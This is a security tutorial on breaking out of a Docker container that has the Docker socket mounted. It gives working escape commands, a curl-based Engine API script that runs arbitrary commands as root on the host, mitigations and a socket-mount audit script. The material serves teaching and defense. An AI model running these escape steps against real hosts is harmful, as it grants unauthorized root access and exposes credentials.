Overview

Some Docker images available on Docker Hub, such as Portainer or Nginx, require /var/run/docker.sock to be mounted into the container as a volume. That socket is the Docker daemon's API endpoint, so a process that can talk to it can manage every other container on the host. Unfortunately, the same access gives an attacker who lands inside that container a way to take control of the host itself.

Preconditions

  • The attacker has obtained code execution inside a Docker container
  • The container has /var/run/docker.sock mounted

Checking whether the preconditions are fulfilled

To simulate the preconditions we start an Alpine container with docker.sock mounted:

docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock alpine sh

Let's make sure the socket has actually been mounted:

ls /var/run/docker.sock 
/var/run/docker.sock

Next, check whether the docker CLI is installed inside the container:

docker

Result:

sh: docker: not found

The docker command was not found, so it has to be installed. The docker meta-package also pulls in docker-engine, containerd and runc; only docker-cli is needed to talk to the host's daemon, but the full package is used here:

apk update
apk add -U docker
/ # apk update
fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/community/x86_64/APKINDEX.tar.gz
v3.12.1-34-g3bbb400149 [http://dl-cdn.alpinelinux.org/alpine/v3.12/main]
v3.12.1-37-gb1aa03461c [http://dl-cdn.alpinelinux.org/alpine/v3.12/community]
OK: 12750 distinct packages available
/ # apk add -U docker
(1/12) Installing ca-certificates (20191127-r4)
(2/12) Installing libseccomp (2.4.3-r0)
(3/12) Installing runc (1.0.0_rc10-r1)
(4/12) Installing containerd (1.3.4-r1)
(5/12) Installing libmnl (1.0.4-r0)
(6/12) Installing libnftnl-libs (1.1.6-r0)
(7/12) Installing iptables (1.8.4-r2)
(8/12) Installing tini-static (0.19.0-r0)
(9/12) Installing device-mapper-libs (2.02.186-r1)
(10/12) Installing docker-engine (19.03.12-r0)
(11/12) Installing docker-cli (19.03.12-r0)
(12/12) Installing docker (19.03.12-r0)
Executing docker-19.03.12-r0.pre-install
Executing busybox-1.31.1-r16.trigger
Executing ca-certificates-20191127-r4.trigger
OK: 307 MiB in 26 packages 

Escaping the Docker container

With docker.sock mounted we have the same power as root running docker on the host: we can list, delete, exec into, create and reconfigure containers. Any container created this way is a sibling container on the host, not a nested one, so it can be given any host path as a volume.

Our next step is to create a new container with the host's root directory mounted as a volume:

docker -H unix:///var/run/docker.sock run -it -v /:/host alpine sh

The -H flag is optional here, because /var/run/docker.sock is the CLI's default endpoint; -it already allocates a TTY, so an extra -t is redundant.

Now chroot into the host directory:

chroot /host

The attacker now has full root access to the host's file system: /etc/shadow, SSH keys, cron directories and every other container's data are readable and writable. Note that chroot only changes the file system view; the shell still runs inside the container's PID and network namespaces. To enter the host's namespaces as well, start the container with --privileged --pid=host and run nsenter -t 1 -m -u -n -i sh, which joins the namespaces of the host's PID 1.
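The same escape can be driven through the Docker Engine API directly, which is useful when the CLI cannot be installed in the compromised container (no package manager, no network). The script below is an added example and not part of the original post. It assumes curl is available (apk add curl), that the socket is at /var/run/docker.sock unless DOCKER_SOCK is set, and that the host daemon can resolve the alpine image; sock_check, create_body, api, container_id and escape_via_api are names chosen for this example.

```sh
#!/bin/sh
# Added example, not from the original post: the docker.sock escape driven
# through the Engine API with curl instead of the docker CLI.
# Assumptions: curl is installed, DOCKER_SOCK (default /var/run/docker.sock)
# points at the mounted socket, and "alpine" can be resolved by the daemon.

SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"

# sock_check PATH: 0 if PATH is a unix socket we can read and write,
# 1 if it is missing or not a socket, 2 if it exists but is not accessible.
sock_check() {
  if [ ! -S "$1" ]; then
    echo "no unix socket at $1" >&2
    return 1
  fi
  if [ ! -r "$1" ] || [ ! -w "$1" ]; then
    echo "$1 exists but uid $(id -u) cannot read/write it" >&2
    return 2
  fi
  return 0
}

# create_body IMAGE CMD: JSON for POST /containers/create that binds the host
# root to /host and runs CMD inside a chroot of it. Tty:true makes the logs
# endpoint return raw output instead of the 8-byte-header multiplexed stream.
# CMD must not contain double quotes.
create_body() {
  printf '{"Image":"%s","Cmd":["sh","-c","chroot /host sh -c \\"%s\\""],"Tty":true,"HostConfig":{"Binds":["/:/host"]}}' "$1" "$2"
}

# api METHOD PATH [BODY]: one request to the Engine API over the unix socket.
api() {
  if [ $# -ge 3 ]; then
    curl -sS --unix-socket "$SOCK" -X "$1" -H 'Content-Type: application/json' \
      --data "$3" "http://localhost/$2"
  else
    curl -sS --unix-socket "$SOCK" -X "$1" "http://localhost/$2"
  fi
}

# container_id: pull the Id field out of a /containers/create response on stdin.
container_id() {
  sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# escape_via_api CMD: create, start, wait for and then remove a sibling
# container that runs CMD chrooted into the host root; prints its output.
escape_via_api() {
  sock_check "$SOCK" || return 1
  id=$(api POST containers/create "$(create_body alpine "$1")" | container_id)
  [ -n "$id" ] || { echo "container create failed" >&2; return 1; }
  api POST "containers/$id/start" >/dev/null
  api POST "containers/$id/wait" >/dev/null
  api GET "containers/$id/logs?stdout=1&stderr=1"
  api DELETE "containers/$id?force=1" >/dev/null
}

# Only act when invoked explicitly, so sourcing this file is harmless.
if [ "${1:-}" = "--run" ]; then
  escape_via_api "${2:-id; cat /etc/hostname}"
fi
```

Run it as `sh escape.sh --run` to print the host's uid and /etc/hostname from inside the container, or pass your own command as the second argument. /etc/hostname is read rather than calling hostname because the chrooted shell still lives in the container's UTS namespace and would otherwise report the container's name.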

How to secure?

  • Do not mount /var/run/docker.sock into containers at all if you can avoid it. Mounting it read-only (:ro) does not help: clients connect to the socket rather than write to the file, and the whole API remains usable through a read-only bind mount.
  • If a container genuinely needs it, treat that container as a root-privileged application: minimise its image, keep it patched, do not expose its service to the network without authentication, and consider placing an API-filtering proxy between the container and the socket so it can only call the endpoints it needs.
  • Run Docker in rootless mode, so that the daemon itself is not root and an escape lands in an unprivileged user account rather than in root (some Docker features may not work properly in this mode).
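To find out whether any container on a host already has the socket mounted, the following audit script is an added example (not part of the original post). It assumes the docker CLI is installed on the host and can reach the daemon; find_sock_mounts and audit_containers are names chosen for this example.

```sh
#!/bin/sh
# Added example, not from the original post: audit a host for containers that
# have the Docker socket mounted. Assumes the docker CLI is present and can
# reach the daemon, i.e. it runs on the host with administrator rights.

# find_sock_mounts: reads lines of "<name> <source> <source> ..." on stdin and
# prints the name of every container that mounts a path ending in docker.sock
# (covers both /var/run/docker.sock and /run/docker.sock).
find_sock_mounts() {
  awk '{ for (i = 2; i <= NF; i++) if ($i ~ /docker\.sock$/) { print $1; break } }'
}

# audit_containers: inspect every container (running or stopped) and list the
# offenders. The format prints the container name followed by the host-side
# source of each of its mounts, one container per line.
audit_containers() {
  ids=$(docker ps -aq)
  [ -n "$ids" ] || return 0
  # $ids is intentionally unquoted: one argument per container id
  docker inspect --format '{{.Name}} {{range .Mounts}}{{.Source}} {{end}}' $ids | find_sock_mounts
}

# Only act when invoked explicitly, so sourcing this file is harmless.
if [ "${1:-}" = "--run" ]; then
  found=$(audit_containers)
  if [ -n "$found" ]; then
    echo "containers with the Docker socket mounted:"
    echo "$found"
    exit 1
  fi
  echo "no container mounts the Docker socket"
fi
```

Run it as `sh audit.sh --run`; it exits non-zero when at least one container mounts the socket, so it can be dropped into a CI or cron check. Because the exposure is a mount, not a process, stopped containers are included: they become dangerous again the moment someone starts them.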

Sources